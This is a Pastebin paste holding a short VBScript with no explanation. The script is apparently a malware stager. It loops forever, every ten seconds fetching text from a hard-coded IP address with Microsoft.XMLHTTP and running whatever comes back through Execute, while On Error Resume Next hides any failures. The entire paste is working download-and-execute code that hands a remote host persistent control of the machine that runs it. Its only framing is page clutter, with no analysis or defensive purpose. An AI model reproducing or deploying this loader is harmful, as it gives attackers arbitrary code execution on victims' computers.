Advertisement
Guest User

Untitled

a guest
Jun 15th, 2018
985
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ' neIEKkbjB
  2. dim oblect, url
  3. Function  MyLoad()
  4.   On Error Resume Next
  5.   url = "http://107.174.170.104/z/" + FormatDateTime(Now, vbLongTime)  
  6.   Set oblect = createobject("Microsoft.XMLHTTP")
  7.   oblect.Open "GET", url, False
  8.   oblect.Send
  9.     If oblect.Status = 200 Then
  10.         Execute "" + oblect.responseText + ""
  11.         WScript.Sleep 10000
  12.         MyLoad()
  13.     Else
  14.         WScript.Sleep 10000
  15.         MyLoad()
  16.     End If
  17. End Function
  18. MyLoad()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement